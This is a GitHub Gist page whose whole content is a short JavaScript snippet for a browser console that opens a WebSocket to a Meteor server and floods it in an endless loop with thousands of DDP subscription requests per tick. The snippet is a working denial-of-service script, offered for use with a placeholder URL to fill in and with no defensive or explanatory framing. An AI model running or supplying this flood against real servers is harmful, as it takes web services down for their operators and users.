Last active
May 21, 2017 20:13
-
-
Save MLaszczewski/3462cd98baf24e7c5d5b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Enter this code to javascript console | |
var ws=new WebSocket("ws://example.com/sockjs/200/urqspahk/websocket"); // Put here your websocket url | |
var loop=function(){ | |
for(var i=0; i<10000; i++) ws.send('["{\\"msg\\":\\"sub\\",\\"id\\":\\"vcpG9kLW6pkCcinsS'+Date.now()+'\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}"]') | |
setTimeout(loop,0) | |
} | |
ws.onopen = function(){ | |
ws.send('["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]') | |
loop() | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment